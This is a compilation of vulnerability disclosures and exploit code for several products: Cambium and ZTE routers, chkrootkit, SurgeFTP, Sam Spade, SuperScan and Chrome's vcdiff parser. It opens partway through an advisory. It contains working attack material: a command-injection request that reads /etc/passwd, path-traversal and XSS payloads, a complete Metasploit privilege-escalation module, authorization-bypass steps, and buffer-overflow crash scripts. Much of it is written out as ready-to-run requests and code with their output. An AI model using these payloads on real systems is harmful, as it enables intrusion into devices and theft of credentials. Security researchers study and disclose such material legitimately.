Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
username=home&password=<password>
.....
Login - HTTP Response
..
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Set-Cookie: sysauth=<home-sysauth_value>;
path=/cgi-bin/luci/;stok=<home-stok-value>
Content-Type: application/json
Expires: 0
Date: Sun, 18 Jan 1970 16:40:50 GMT
Server: Cambium HTTP Server
{ "stok": <home-stok_value>", "certif_dir": "/tmp/new_certificates/",
"status_url": "/cgi-bin/luci/;stok=<home-stok_value>/admin/status }
..
*Sending HTTP request for Ping function
*
.....
HTTP Request
.....
POST /cgi-bin/luci/;stok=<home-stok_value>/admin/ping HTTP/1.1
Host: <IP_address>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0)
Gecko/20100101 Firefox/38.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://<IP_address>/
Cookie: sysauth=<home-sysauth_value>;
globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22installer%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D;
userType=Home User; usernameType=home; stok=<home-stok_value>
DNT: 1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
ping_ip=8.8.8.8|cat%20/etc/passwd%20||&packets_num=1&buf_size=1&ttl=1&debug=0
.....
HTTP Response
.....
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: text/plain
Expires: 0
Date: Sun, 18 Jan 1970 14:45:37 GMT
Server: Cambium HTTP Server
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
admin:<password_hash>:1000:4:admin:/tmp:/usr/bin/clish
installer:<password_hash>:2000:100:installer:/tmp:/bin/false
home:<password_hash>:3000:100:home:/tmp:/bin/false
readonly:<password_hash>:4000:100:readonly:/tmp:/bin/false
dashboard:<password_hash>:5000:100:dashboard:/tmp:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
root:<password_hash>:0:0:root:/root:/bin/ash
..
Similarly, Traceroute function can be exploited.
......................................................................................................................................................
3. *Weak Authorization Controls + Information Disclosure*
In addition to 'admin', only 'installer' user has the option to access
device configuration. ‘home’ user does not have GUI option and should
not be able to access / download device configuration. However, the
application lacks strict authorization measures and the low-privileged
'home' user can gain unauthorized access to the device configuration
simply by requesting it.
*Configuration backup export* can be performed by directly accessing
the following url:
*http://<IP_address>/cgi-bin/luci/;stok=<homeuser-stok_value>/admin/config_export?opts=json
*
Upon a successful config export, full device configuration with
clear-text passwords, usernames, keys, IP addresses, statistics, logs
etc is downloaded.
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, max-age=0, must-revalidate,
post-check=0, pre-check=0
Cache-Control: no-cache
Status: 200 OK
Content-Type: application/json
Content-Disposition: attachment; filename=<filename>.json
Expires: 0
Date: Sun, 18 Jan 1970 16:50:21 GMT
Server: Cambium HTTP Server
{
"template_props":
{
"templateName":"",
"templateDescription":"",
"device_type":"",
…
<output - snipped>
…
}
.....
Best Regards,
Karn Ganeshen
--
Best Regards,
Karn Ganeshen
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privsec.
WfsDelay is set to 24h, since this is how often a chkrootkit
scan is scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['CWE', '20'],
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => 'Jun 04 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
))
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end
# Exploit Title: [ZTE ZXHN H108N R1A + ZXV10 W300 routers - multiple
vulnerabilities]
# Discovered by: Karn Ganeshen
# CERT VU# 391604
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported
# ZTE ZXHN H108N R1A - Software version ZTE.bhs.ZXHNH108NR1A
# ZTE ZXV10 W300 - Software version - w300v1.0.0f_ER1_PE
Overview
ZTE ZXHN H108N R1A router, version ZTE.bhs.ZXHNH108NR1A.h_PE, and ZXV10
W300 router, version W300V1.0.0f_ER1_PE, contain multiple vulnerabilities.
*CVE-ID*:
CVE-2015-7248
CVE-2015-7249
CVE-2015-7250
CVE-2015-7251
CVE-2015-7252
*Note*: Large deployment size, primarily in Peru, used by TdP.
Description
*CWE-200* <https://cwe.mitre.org/data/definitions/200.html>*: Information
Exposure* - CVE-2015-7248
Multiple information exposure vulnerabilities enable an attacker to obtain
credentials and other sensitive details about the ZXHN H108N R1A.
A. User names and password hashes can be viewed in the page source of
http://<IP>/cgi-bin/webproc
PoC:
Login Page source contents:
...snip....
//get user info
var G_UserInfo = new Array();
var m = 0;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "admin"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped/; //Password Hash seen here
G_UserInfo[m][2] = "1"; //Level
G_UserInfo[m][3] = "1"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "user"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "2"; //Index
m++;
G_UserInfo[m] = new Array();
G_UserInfo[m][0] = "support"; //UserName
G_UserInfo[m][1] = "$1$Tsnipped"; //Password Hash seen here
G_UserInfo[m][2] = "2"; //Level
G_UserInfo[m][3] = "3"; //Index
m++;
...snip...
B. The configuration file of the device contains usernames, passwords,
keys, and other values in plain text, which can be used by a user with
lower privileges to gain admin account access. This issue also affects ZTE
ZXV10 W300 models, version W300V1.0.0f_ER1_PE.
*CWE-285* <https://cwe.mitre.org/data/definitions/285.html>*: Improper
Authorization* - CVE-2015-7249
By default, only admin may authenticate directly with the web
administration pages in the ZXHN H108N R1A. By manipulating parameters in
client-side requests, an attacker may authenticate as another existing
account, such as user or support, and may be able to perform actions
otherwise not allowed.
PoC 1:
1. Login page user drop-down option shows only admin only.
2. Use an intercepting proxy / Tamper Data - and intercept the Login submit
request.
3. Change the username admin to user / support and continue Login.
4. Application permits other users to log in to mgmt portal.
PoC 2:
After logging in as support, some functional options are visibly
restricted. Certain actions can still be performed by calling the url
directly. Application does not perform proper AuthZ checks.
Following poc is a change password link. It is accessible directly, though
it (correctly) is restricted to changing normal user (non-admin) password
only.
http://
<IP>/cgi-bin/webproc?getpage=html/index.html&var:menu=maintenance&var:page=accessctrl&var:subpage=accountpsd
Other functions / pages may also be accessible to non-privileged users.
*CWE-22* <http://cwe.mitre.org/data/definitions/22.html>*: Improper
Limitation of a Pathname to a Restricted Directory ('Path Traversal') *-
CVE-2015-7250
The webproc cgi module of the ZXHN H108N R1A accepts a getpage parameter
which takes an unrestricted file path as input, allowing an attacker to
read arbitrary files on the system.
Arbitrary files can be read off of the device. No authentication is
required to exploit this vulnerability.
PoC
HTTP POST request
POST /cgibin/webproc HTTP/1.1
Host: IP
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
AcceptLanguage: enUS,en;q=0.5
AcceptEncoding: gzip, deflate
Referer: https://IP/cgibin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keepalive
ContentType: application/xwwwformurlencoded
ContentLength: 177
getpage=html%2Findex.html&errorpage=%2fetc%2fpasswd&var%3Amenu=setup&var%3Apage=wancfg&obj
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
HTTP Response
HTTP/1.0 200 OK
Contenttype: text/html
Pragma: nocache
CacheControl: nocache
setcookie: sessionid=7ce7bd4a; expires=Fri, 31Dec9999 23:59:59
GMT;path=/
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
*CWE-798* <http://cwe.mitre.org/data/definitions/798.html>*: Use of
Hard-coded Credentials* - CVE-2015-7251
In the ZXHN H108N R1A, the Telnet service, when enabled, is accessible
using the hard-coded credentials 'root' for both the username and password.
*CWE-79* <https://cwe.mitre.org/data/definitions/79.html>*: Improper
Neutralization of Input During Web Page Generation ('Cross-site
Scripting') *- CVE-2015-7252
In the ZXHN H108N R1A, the errorpage parameter of the webproc cgi module is
vulnerable to reflected cross-site scripting [pre-authentication].
PoC
POST /cgibin/webproc HTTP/1.1
Host: IP
UserAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101
Firefox/18.0 Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
AcceptLanguage: enUS,en;q=0.5
AcceptEncoding: gzip, deflate
Referer: https://IP/cgibin/webproc
Cookie: sessionid=7ce7bd4a; language=en_us; sys_UserName=admin
Connection: keepalive
ContentType: application/xwwwformurlencoded
ContentLength: 177
getpage=html%2Findex.html&*errorpage*=html%2fmain.html<script>alert(1)</script>&var%3Amenu=setup&var%3Apage=wancfg&obj
action=auth&%3Ausername=admin&%3Apassword=admin&%3Aaction=login&%3Asessionid=7ce7bd4a
+++++
--
Best Regards,
Karn Ganeshen
# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter username change from 'support' to
'admin'
e. Enter the new password > old password is not requested > Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: < admin/XXX1
$sh
ADSL#login show <-- shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <-- admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn Ganeshen
********************************************************************************************
# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities
# Date: 11/18/2015
# Exploit Author: Un_N0n
# Vendor: NetWin
# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
# Version: 23d6
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]
Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities.
They are:
Stored XSS in 'Domain Name' field.
[How to?]
1. Open SurgeFTP web interface, Click on global option from the menu.
2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section.
Stored XSS in 'Mirrors'.
[How to?]
1. Open surgeftp web interface, Click on 'Mirrors' option from the menu.
2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field.
Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP.
Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload
which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload,
therefore White-listing is the correct solution.
#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer Overflow Crash PoC
# Discovery by : Vivek Mahajan - c3p70r
# Discovery Date : 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://
buffer = "A"*510
file = open("spade.txt, 'w')
file.write(buffer)
file.close()
# Follow on twitter @vik.create
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by : Luis Martínez
# Email : l4m5@hotmail.com
# Discovery Date : 18/11/2015
# Vendor Homepage : http://www.foundstone.com
# Software Link : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version : 4.1
# Vulnerability Type : Denial of Service (DoS) Local
# Tested on OS : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash:
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this:
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***
# And the Stack
#00E3FF88 41414141 AAAA
#00E3FF8C 41414141 AAAA
#00E3FF90 41414141 AAAA
#00E3FF94 41414141 AAAA
#00E3FF98 42424242 BBBB Pointer to next SEH record
#00E3FF9C 43434343 CCCC SE handler
# And the Registers
#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141
buffer = "\x41" * 328
nseh = "\x42" * 4
seh = "\x43" * 4
f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()
Source: https://code.google.com/p/google-security-research/issues/detail?id=513
There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.
(/src/sdch/open-vcdiff/src/headerparser.cc)
bool VCDiffHeaderParser::ParseSectionLengths(
bool has_checksum,
size_t* add_and_run_data_length,
size_t* instructions_and_sizes_length,
size_t* addresses_length,
VCDChecksum* checksum) {
ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled
ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled
ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled
if (has_checksum) {
ParseChecksum("Adler32 checksum value", checksum);
}
if (RESULT_SUCCESS != return_code_) {
return false;
}
if (!delta_encoding_start_) {
VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
"was called before ParseWindowLengths" << VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
const size_t delta_encoding_header_length =
UnparsedData() - delta_encoding_start_;
if (delta_encoding_length_ !=
(delta_encoding_header_length +
*add_and_run_data_length +
*instructions_and_sizes_length +
*addresses_length)) { // <---- Integer overflow here (32-bit systems only)
VCD_ERROR << "The length of the delta encoding does not match "
"the size of the header plus the sizes of the data sections"
<< VCD_ENDL;
return_code_ = RESULT_ERROR;
return false;
}
return true;
}
These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024)
size_t add_and_run_data_length = 0;
size_t instructions_and_sizes_length = 0;
size_t addresses_length = 0;
if (!header_parser->ParseSectionLengths(has_checksum_,
&add_and_run_data_length,
&instructions_and_sizes_length,
&addresses_length,
&expected_checksum_)) {
return header_parser->GetResult();
}
if (parent_->AllowInterleaved() &&
// snip...
} else {
// If interleaved format is not used, then the whole window contents
// must be available before decoding can begin. If only part of
// the current window is available, then report end of data
// and re-parse the whole header when DecodeChunk() is called again.
if (header_parser->UnparsedSize() < (add_and_run_data_length +
instructions_and_sizes_length +
addresses_length)) {
return RESULT_END_OF_DATA;
}
data_for_add_and_run_.Init(header_parser->UnparsedData(),
add_and_run_data_length);
instructions_and_sizes_.Init(data_for_add_and_run_.End(),
instructions_and_sizes_length);
addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);
This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.
It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.
It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH.
VERSION
Chrome Version: 47.0.2499.0
Operating System: Linux x86
REPRODUCTION CASE
Please include a demonstration of the security bug, such as an attached
HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
make the file as small as possible and remove any content not required to
demonstrate the bug.
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State:
eax 0xf9ae8a78 -106001800
ecx 0xe7502d43 -414175933
edx 0x7b83e020 2072240160
ebx 0xf76597a0 -144336992
esp 0xe75025d0 0xe75025d0
ebp 0xe7502798 0xe7502798
esi 0x5 5
edi 0xf9061200 -117042688
eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>
eflags 0x210a93 [ CF AF SF IF OF RF ID ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
=> 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx
0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi
0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1)
0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118>
0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx
#0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
#1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
#2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
#3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
#4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
#5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
#6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424
#7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
#8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
#9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673
#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip